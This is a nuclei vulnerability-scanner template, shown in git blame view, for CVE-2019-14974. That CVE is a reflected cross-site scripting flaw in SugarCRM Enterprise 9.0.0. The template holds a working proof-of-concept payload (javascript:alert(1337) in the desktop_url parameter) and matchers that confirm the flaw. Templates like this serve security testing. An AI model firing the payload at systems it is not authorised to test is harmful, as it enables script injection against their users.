nuclei-templates/cves/2019/CVE-2019-14974.yaml

22 lines
506 B
YAML
Raw Normal View History

2021-01-02 04:59:06 +00:00
id: CVE-2019-14974
2020-04-08 12:49:45 +00:00
info:
name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting
author: madrobot
2020-05-25 07:49:06 +00:00
severity: low
tags: cve,cve2019,xss
2020-04-08 12:49:45 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://"
matchers-condition: and
2020-04-08 12:49:45 +00:00
matchers:
- type: status
status:
2020-05-25 07:49:06 +00:00
- 200
2020-04-08 13:20:23 +00:00
- type: word
2020-04-08 13:24:36 +00:00
words:
2020-05-25 07:49:06 +00:00
- "url = window.location.search.split(\"?desktop_url=\")[1]"
2020-04-08 12:49:45 +00:00
part: body